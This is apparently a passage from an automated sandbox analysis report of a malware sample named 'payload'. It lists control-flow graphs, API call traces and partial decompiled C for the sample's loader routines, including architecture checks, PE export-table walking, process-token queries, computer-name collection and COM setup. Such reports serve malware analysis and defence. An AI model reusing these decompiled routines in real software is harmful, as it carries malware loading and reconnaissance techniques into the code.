    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012A1F47), ref: 012A1E56
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 215 12a39eb-12a3a2a lstrcpyn 216 12a3a2c-12a3a31 215->216 217 12a3a3d-12a3a41 216->217 218 12a3a33-12a3a39 216->218 220 12a3a43-12a3a45 217->220 221 12a3a47-12a3a49 217->221 218->217 219 12a3a3b 218->219 219->217 220->216 220->221 222 12a3a4f-12a3a54 221->222 223 12a3b04 221->223 225 12a3a5a-12a3a5e 222->225 226 12a3afb-12a3b02 222->226 224 12a3b0b-12a3b12 223->224 225->226 227 12a3a64-12a3a92 VirtualAlloc 225->227 226->224 228 12a3af2-12a3af9 227->228 229 12a3a94-12a3ac8 call 12a274b 227->229 228->224 232 12a3aca-12a3ad9 memcpy 229->232 233 12a3adb 229->233 234 12a3ae2-12a3af0 VirtualFree 232->234 233->234 234->224
    APIs
    • lstrcpyn.KERNEL32(00000000,012AA26C,00000008,00000000), ref: 012A3A10
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 012A3A88
    • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 012A3AD1
    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 012A3AEA
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 247 12a4f8d-12a4fd6 SysAllocString 248 12a50de-12a50e1 247->248 249 12a4fdc-12a5008 247->249 250 12a50ec-12a50ef 248->250 251 12a50e3-12a50e6 SafeArrayDestroy 248->251 255 12a50db 249->255 256 12a500e-12a501a call 12a4f30 249->256 253 12a50fa-12a5100 250->253 254 12a50f1-12a50f4 SysFreeString 250->254 251->250 254->253 255->248 256->255 259 12a5020-12a5030 256->259 259->255 261 12a5036-12a5054 259->261 261->255 264 12a505a-12a506c ObjectStublessClient10 261->264 265 12a506e-12a5071 264->265 266 12a50a1-12a50ac call 12a4cf9 264->266 265->266 267 12a5073-12a5083 StrStrIW 265->267 271 12a50b1-12a50b5 266->271 269 12a5098-12a509b SysFreeString 267->269 270 12a5085-12a508e call 12a4db8 267->270 269->266 270->269 278 12a5090-12a5093 call 12a4f30 270->278 272 12a50d2-12a50d7 271->272 273 12a50b7-12a50bc 271->273 272->255 275 12a50be-12a50cb 273->275 276 12a50cd 273->276 275->272 276->272 278->269
    APIs
    • SysAllocString.OLEAUT32(?), ref: 012A4FCB
    • ObjectStublessClient10.OLE32(?,?), ref: 012A5064
    • StrStrIW.SHLWAPI(?,012AC000), ref: 012A507B
    • SysFreeString.OLEAUT32(?), ref: 012A509B
      • Part of subcall function 012A4DB8: SysAllocString.OLEAUT32(012AA280), ref: 012A4E00
      • Part of subcall function 012A4DB8: lstrcmpW.KERNEL32(00000000,012AC068), ref: 012A4ECF
      • Part of subcall function 012A4CF9: ObjectStublessClient10.OLE32(?,?,00000000,?,00000000,012A50B1,?,00000008), ref: 012A4D0F
      • Part of subcall function 012A4CF9: Sleep.KERNEL32(000000C8), ref: 012A4D27
      • Part of subcall function 012A4CF9: lstrlenW.KERNEL32(?), ref: 012A4D5D
      • Part of subcall function 012A4CF9: memcpy.NTDLL(00000000,?,?,?), ref: 012A4D7E
      • Part of subcall function 012A4CF9: SysFreeString.OLEAUT32(?), ref: 012A4D92
    • SafeArrayDestroy.OLEAUT32(?), ref: 012A50E6
    • SysFreeString.OLEAUT32(?), ref: 012A50F4
      • Part of subcall function 012A4F30: Sleep.KERNELBASE(000001F4), ref: 012A4F75
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 299 401c4a-401c60 300 401c62-401c85 GetModuleHandleA GetProcAddress 299->300 301 401c87-401c89 299->301 300->301 302 401c99-401c9e 300->302 301->302 303 401c8b-401c94 IsWow64Process 301->303 303->302 304 401c96 303->304 304->302
    C-Code - Quality: 58%
    			E00401C4A(void* __ecx) {
    				signed int _v8;
    				_Unknown_base(*)()* _t7;
    				signed int _t9;
    				struct HINSTANCE__* _t10;
    				intOrPtr _t14;
    
    				_t7 =  *0x4054c0;
    				_v8 = _v8 & 0x00000000;
    				_t14 =  *0x405474; // 0xcc
    				if(_t7 != 0) {
    					L2:
    					if(_t14 != 0) {
    						_t9 =  *_t7(_t14,  &_v8); // executed
    						if(_t9 == 0) {
    							_v8 = _v8 & _t9;
    						}
    					}
    					L5:
    					return _v8;
    				}
    				_t10 = GetModuleHandleA("KERNEL32.DLL");
    				 *0x4054c8 = _t10;
    				_t7 = GetProcAddress(_t10, "IsWow64Process");
    				 *0x4054c0 = _t7;
    				if(_t7 == 0) {
    					goto L5;
    				}
    				goto L2;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,004010E8,?,00000000), ref: 00401C67
    • GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,004010E8,?,00000000), ref: 00401C78
    • IsWow64Process.KERNELBASE(000000CC,00000000,0000000C,?,?,004010E8,?,00000000), ref: 00401C90
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 305 12a4cf9-12a4d17 ObjectStublessClient10 306 12a4dae-12a4db5 305->306 307 12a4d1d-12a4d20 305->307 308 12a4d3a-12a4d3d 307->308 309 12a4d22-12a4d37 Sleep 307->309 308->306 310 12a4d3f-12a4d44 308->310 309->308 312 12a4da1-12a4dac 310->312 313 12a4d46-12a4d58 310->313 312->306 315 12a4d5a-12a4d67 lstrlenW 313->315 316 12a4d98-12a4d9d 313->316 315->316 317 12a4d69-12a4d77 call 12a1000 315->317 316->312 320 12a4d88 317->320 321 12a4d79-12a4d86 memcpy 317->321 322 12a4d8f-12a4d92 SysFreeString 320->322 321->322 322->316
    APIs
    • ObjectStublessClient10.OLE32(?,?,00000000,?,00000000,012A50B1,?,00000008), ref: 012A4D0F
    • Sleep.KERNEL32(000000C8), ref: 012A4D27
    • lstrlenW.KERNEL32(?), ref: 012A4D5D
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • memcpy.NTDLL(00000000,?,?,?), ref: 012A4D7E
    • SysFreeString.OLEAUT32(?), ref: 012A4D92
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 323 12a102a-12a1044 HeapCreate 324 12a104e-12a1063 GetTickCount call 12a3887 323->324 325 12a1046-12a1049 323->325 326 12a10d0-12a10d2 324->326 329 12a1065-12a106f call 12a39eb 324->329 325->326 329->326 332 12a1071-12a1082 329->332 333 12a10a9-12a10ab 332->333 334 12a1084-12a10a7 GetModuleHandleA GetProcAddress 332->334 335 12a10bb-12a10bf 333->335 336 12a10ad-12a10b6 IsWow64Process 333->336 334->333 334->335 338 12a10cb call 12a1e67 335->338 339 12a10c1 335->339 336->335 337 12a10b8 336->337 337->335 338->326 339->338
    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 012A1037
    • GetTickCount.KERNEL32 ref: 012A104E
      • Part of subcall function 012A3887: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,012A1061,?), ref: 012A388F
      • Part of subcall function 012A3887: GetVersion.KERNEL32 ref: 012A389E
      • Part of subcall function 012A3887: GetCurrentProcessId.KERNEL32 ref: 012A38B5
      • Part of subcall function 012A3887: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012A38D2
      • Part of subcall function 012A3887: GetLastError.KERNEL32 ref: 012A38F1
      • Part of subcall function 012A39EB: lstrcpyn.KERNEL32(00000000,012AA26C,00000008,00000000), ref: 012A3A10
      • Part of subcall function 012A39EB: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 012A3A88
      • Part of subcall function 012A39EB: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 012A3AD1
      • Part of subcall function 012A39EB: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 012A3AEA
    • GetModuleHandleA.KERNEL32(012AC09F,?,?,?), ref: 012A1089
    • GetProcAddress.KERNEL32(00000000,012AC8AE,?,?,?), ref: 012A109A
    • IsWow64Process.KERNELBASE(012AB1E8,?,?,?,?), ref: 012A10B2
      • Part of subcall function 012A1E67: memset.NTDLL ref: 012A1EE4
      • Part of subcall function 012A1E67: RtlInitializeCriticalSection.NTDLL(012AB26C), ref: 012A1EF5
      • Part of subcall function 012A1E67: CoInitializeEx.OLE32(00000000,00000002), ref: 012A1F29
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			_entry_() {
    				void* _t1;
    				int _t4;
    				int _t6;
    
    				_t6 = 0;
    				_t1 = HeapCreate(0, 0x400000, 0); // executed
    				 *0x405440 = _t1;
    				if(_t1 != 0) {
    					 *0x405484 = GetModuleHandleA(0);
    					GetCommandLineW(); // executed
    					_t4 = E00401070(); // executed
    					_t6 = _t4;
    					HeapDestroy( *0x405440);
    				}
    				ExitProcess(_t6);
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040100A
    • GetModuleHandleA.KERNEL32(00000000), ref: 0040101A
    • GetCommandLineW.KERNEL32 ref: 00401025
      • Part of subcall function 00401070: GetCursorPos.USER32(?), ref: 0040109B
      • Part of subcall function 00401070: WaitForSingleObject.KERNEL32(00000040), ref: 004010A8
      • Part of subcall function 00401070: GetCursorPos.USER32(?), ref: 004010B7
      • Part of subcall function 00401070: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004011A7
      • Part of subcall function 00401070: GetCurrentThread.KERNEL32(?,00000000), ref: 004011BA
      • Part of subcall function 00401070: GetLastError.KERNEL32(?,00000000), ref: 004011E2
      • Part of subcall function 00401070: ExitProcess.KERNEL32 ref: 004011F4
    • HeapDestroy.KERNEL32 ref: 00401038
    • ExitProcess.KERNEL32 ref: 0040103F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 82%
    			E00401C9F(void* __ebx, void* __ecx, void* __edi, void* _a4) {
    				CHAR* _v8;
    				struct _OVERLAPPED* _v12;
    				long _v16;
    				void _v20;
    				void* __esi;
    				void* __ebp;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				int _t28;
    				long _t32;
    
    				_t34 = __ecx;
    				_v12 = 0;
    				_t16 = E00402526(__ecx, __edi,  &_v8);
    				_t37 = _t16;
    				if(_t16 != 0) {
    					L11:
    					return _v12;
    				}
    				_push(0);
    				_push(_a4);
    				_push(__edi); // executed
    				_t18 = E004027DB(__ebx, __edi, 0, _t37); // executed
    				if(_t18 == 0) {
    					L10:
    					E0040105B(_v8);
    					goto L11;
    				}
    				_push(__ebx);
    				_t32 = E0040292D(__edi, _t34, _t18 - __edi);
    				if(_t32 != 0) {
    					_t23 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
    					_a4 = _t23;
    					if(_t23 != 0xffffffff) {
    						_t24 = SetFilePointer(_t23, _t32, 0, 0); // executed
    						if(_t24 == _t32) {
    							_t28 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
    							if(_t28 != 0 && _v16 == 4) {
    								_v12 = _v20 + __edi;
    							}
    						}
    						CloseHandle(_a4);
    					}
    				}
    				goto L10;
    			}

    APIs
      • Part of subcall function 00402526: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,00401CB5,00000000,?,0000007F), ref: 00402546
      • Part of subcall function 00402526: GetLastError.KERNEL32(?,?,00401CB5,00000000,?,0000007F,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00402584
      • Part of subcall function 004027DB: lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
      • Part of subcall function 004027DB: lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401CEF
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00401D01
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00401D19
    • CloseHandle.KERNEL32(?), ref: 00401D34
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
      • Part of subcall function 012A3B68: NtOpenProcess.NTDLL(00000000,00000400,?,012A1E91), ref: 012A3BAF
      • Part of subcall function 012A3B68: NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 012A3BC2
      • Part of subcall function 012A3B68: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012A3BDE
      • Part of subcall function 012A3B68: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 012A3BFB
      • Part of subcall function 012A3B68: memcpy.NTDLL(00000000,00000000,0000001C), ref: 012A3C08
      • Part of subcall function 012A3B68: NtClose.NTDLL(?), ref: 012A3C1A
      • Part of subcall function 012A3B68: NtClose.NTDLL(00000000), ref: 012A3C24
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • memset.NTDLL ref: 012A1EE4
    • RtlInitializeCriticalSection.NTDLL(012AB26C), ref: 012A1EF5
      • Part of subcall function 012A44A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 012A44DF
      • Part of subcall function 012A44A2: HeapFree.KERNEL32(00000000,00000000), ref: 012A4510
      • Part of subcall function 012A44A2: GetComputerNameW.KERNEL32(00000000,?), ref: 012A451E
      • Part of subcall function 012A44A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 012A4535
      • Part of subcall function 012A44A2: GetComputerNameW.KERNEL32(00000000,?), ref: 012A4546
      • Part of subcall function 012A44A2: HeapFree.KERNEL32(00000000,00000000), ref: 012A4567
      • Part of subcall function 012A1173: HeapFree.KERNEL32(00000000,?,00000008), ref: 012A1336
    • CoInitializeEx.OLE32(00000000,00000002), ref: 012A1F29
      • Part of subcall function 012A1CCE: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012A1CEF
      • Part of subcall function 012A1CCE: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1D44
      • Part of subcall function 012A1CCE: HeapFree.KERNEL32(00000000,?), ref: 012A1DBF
      • Part of subcall function 012A1CCE: CloseHandle.KERNEL32(?), ref: 012A1DCF
      • Part of subcall function 012A1CCE: _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012A1E1B
      • Part of subcall function 012A1CCE: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1E41
      • Part of subcall function 012A1CCE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012A1F47), ref: 012A1E56
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
    • memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
    • SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • CoCreateInstance.OLE32(012AC0BC,00000000,00000001,012AC0CC,012A1D55), ref: 012A21DE
    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 012A2215
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000800,012AA03C), ref: 012A1B54
      • Part of subcall function 012A49C1: memcpy.NTDLL(00000000,00000084,00000084,?,00000000,00000008,?,?,012A1B86,?,?,?,012A1D8F,00000002,?,?), ref: 012A49E3
      • Part of subcall function 012A49C1: memset.NTDLL ref: 012A4A16
      • Part of subcall function 012A49C1: memcpy.NTDLL(?,?,00000000,00000000,?,?,00000000), ref: 012A4A30
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
    • HeapFree.KERNEL32(00000000,?,012AB2A0), ref: 012A1BAB
      • Part of subcall function 012A4A4E: RtlQueryPerformanceFrequency.NTDLL(?), ref: 012A4AB7
      • Part of subcall function 012A4A4E: RtlQueryPerformanceCounter.NTDLL(?), ref: 012A4AC1
      • Part of subcall function 012A4A4E: _aulldiv.NTDLL(?,?,?,?), ref: 012A4AD3
      • Part of subcall function 012A4A4E: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012A4B15
      • Part of subcall function 012A4A4E: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4B38
      • Part of subcall function 012A4A4E: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4B56
      • Part of subcall function 012A4A4E: StrTrimA.SHLWAPI(00000000,012AA27C), ref: 012A4B8D
      • Part of subcall function 012A4A4E: wcstombs.NTDLL ref: 012A4C53
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?,00000000), ref: 012A4CAB
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A4CBB
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 012A4CC9
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?), ref: 012A4CD9
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?), ref: 012A4CE9
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    APIs
    • InterlockedIncrement.KERNEL32(012AB1D4), ref: 012A113E
      • Part of subcall function 012A102A: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 012A1037
      • Part of subcall function 012A102A: GetTickCount.KERNEL32 ref: 012A104E
      • Part of subcall function 012A102A: GetModuleHandleA.KERNEL32(012AC09F,?,?,?), ref: 012A1089
      • Part of subcall function 012A102A: GetProcAddress.KERNEL32(00000000,012AC8AE,?,?,?), ref: 012A109A
      • Part of subcall function 012A102A: IsWow64Process.KERNELBASE(012AB1E8,?,?,?,?), ref: 012A10B2
    • InterlockedDecrement.KERNEL32(012AB1D4), ref: 012A115E
      • Part of subcall function 012A10D5: SetEvent.KERNEL32(012AB200), ref: 012A10E0
      • Part of subcall function 012A10D5: SleepEx.KERNEL32(00000064,00000001), ref: 012A10EF
      • Part of subcall function 012A10D5: CloseHandle.KERNEL32(012AB200), ref: 012A1110
      • Part of subcall function 012A10D5: HeapDestroy.KERNEL32(012AB1D0), ref: 012A1120
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 86%
    			E004027DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t56;
    				intOrPtr* _t57;
    				intOrPtr _t60;
    				signed int _t61;
    				CHAR* _t65;
    				intOrPtr* _t77;
    				intOrPtr _t79;
    				CHAR* _t80;
    				intOrPtr _t85;
    				signed int _t88;
    				signed short* _t90;
    				void* _t94;
    				void* _t95;
    				void* _t108;
    
    				_push(0x2c);
    				_push(0x404108);
    				E00402D2C(__ebx, __edi, __esi);
    				 *((intOrPtr*)(_t95 - 0x24)) = 0;
    				 *(_t95 - 4) = 0;
    				_t85 =  *((intOrPtr*)(_t95 + 8));
    				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
    				if( *((short*)(_t56 + 4)) != 0x14c) {
    					_t57 = _t56 + 0x88;
    				} else {
    					_t57 = _t56 + 0x78;
    				}
    				_t94 =  *_t57 + _t85;
    				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
    					L27:
    					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
    					return E00402D67( *((intOrPtr*)(_t95 - 0x24)));
    				} else {
    					_t60 =  *((intOrPtr*)(_t94 + 0x14));
    					if(_t60 != 0) {
    						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
    						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
    						_t88 =  *(_t95 + 0xc);
    						 *(_t95 - 0x20) = _t88;
    						if(_t88 == 0 || _t88 > 0xffff) {
    							 *(_t95 - 0x20) = 0;
    							_t60 =  *((intOrPtr*)(_t94 + 0x18));
    						}
    						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
    						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
    							_t61 =  *(_t95 - 0x20);
    							if(_t61 != 0) {
    								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
    							}
    							goto L27;
    						}
    						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
    						 *(_t95 - 0x3c) = _t90;
    						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
    						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
    						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
    						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
    							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
    							if( *(_t95 - 0x20) == 0) {
    								_t65 =  *_t77 + _t85;
    								 *(_t95 - 0x30) = _t65;
    								_t80 =  *(_t95 + 0xc);
    								if(_t80 == 0) {
    									E004029F9(lstrlenA(_t65),  *(_t95 - 0x30));
    									L19:
    									if(_t108 == 0) {
    										 *(_t95 - 0x1c) = 1;
    									}
    									L21:
    									if( *(_t95 - 0x1c) == 0) {
    										_t77 = _t77 + 4;
    										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
    										_t90 =  &(_t90[1]);
    										 *(_t95 - 0x3c) = _t90;
    										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
    										_t85 =  *((intOrPtr*)(_t95 + 8));
    										continue;
    									}
    									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
    									if(0 != 0) {
    										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
    									}
    									goto L27;
    								}
    								if( *_t65 !=  *_t80) {
    									goto L21;
    								}
    								lstrcmpA(_t65, _t80); // executed
    								goto L19;
    							}
    							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
    							goto L19;
    						}
    					}
    					goto L27;
    				}
    			}
    0x004027db
    0x004027dd
    0x004027e2
    0x004027e9
    0x004027ec
    0x004027ef
    0x004027f5
    0x004027fd
    0x00402804
    0x004027ff
    0x004027ff
    0x004027ff
    0x0040280b
    0x0040280f
    0x0040291e
    0x0040291e
    0x0040292a
    0x00402827
    0x00402827
    0x0040282c
    0x00402835
    0x00402837
    0x0040283a
    0x0040283d
    0x00402842
    0x0040284c
    0x0040284f
    0x0040284f
    0x00402852
    0x00402858
    0x00402903
    0x00402908
    0x0040290e
    0x0040290e
    0x00000000
    0x00402908
    0x00402861
    0x00402863
    0x00402869
    0x0040286b
    0x0040286e
    0x00402872
    0x0040287e
    0x00402886
    0x00402895
    0x00402897
    0x0040289a
    0x0040289f
    0x004028bd
    0x004028c5
    0x004028c5
    0x004028c7
    0x004028c7
    0x004028ce
    0x004028d2
    0x004028ed
    0x004028f0
    0x004028f4
    0x004028f5
    0x004028f8
    0x004028fb
    0x00000000
    0x004028fb
    0x004028dd
    0x004028e2
    0x004028e9
    0x004028e9
    0x00000000
    0x004028e2
    0x004028a5
    0x00000000
    0x00000000
    0x004028a9
    0x00000000
    0x004028af
    0x0040288e
    0x00000000
    0x0040288e
    0x00402872
    0x00000000
    0x0040282c

    APIs
    • lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
    • lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
      • Part of subcall function 012A1BC6: GetSystemTimeAsFileTime.KERNEL32(?,012A1D55,00000000,?,00000000,?,00000000,?,?,012A1D55), ref: 012A1BFC
      • Part of subcall function 012A1BC6: HeapFree.KERNEL32(00000000,00000000,012A1D55), ref: 012A1C2C
    • GetModuleHandleA.KERNEL32(012AC0EA,?,012ACA6A,00000014,?,012AA03C,00000000,?,?,?,012A1D55), ref: 012A1C71
      • Part of subcall function 012A2544: SysAllocString.OLEAUT32(?), ref: 012A255E
      • Part of subcall function 012A2544: SysFreeString.OLEAUT32(00000000), ref: 012A2595
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 88%
    			E004022AD(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
    				void* __ecx;
    				void* __esi;
    				void* _t20;
    				void* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t26;
    
    				_t24 = __edx;
    				_t22 = 8;
    				_t26 = E00401046(0x318);
    				if(_t26 != 0) {
    					memset(_t26, 0, 0x318);
    					asm("cdq");
    					 *((intOrPtr*)(_t26 + 8)) = _a8;
    					 *((intOrPtr*)(_t26 + 0xc)) = _t24;
    					asm("cdq");
    					 *((intOrPtr*)(_t26 + 0x10)) = _a12;
    					 *((intOrPtr*)(_t26 + 0x14)) = _t24;
    					if((_a16 & 0x00000010) != 0) {
    						L4:
    						_t20 = E0040218D(_a4, _t23, _t24, _t26); // executed
    					} else {
    						_t31 =  *0x405480 & 0x00000001;
    						if(( *0x405480 & 0x00000001) == 0) {
    							goto L4;
    						} else {
    							_t20 = E0040203C(_t23, _t24, _t26, _t31, _a4);
    						}
    					}
    					_t22 = _t20;
    					E0040105B(_t26);
    				}
    				return _t22;
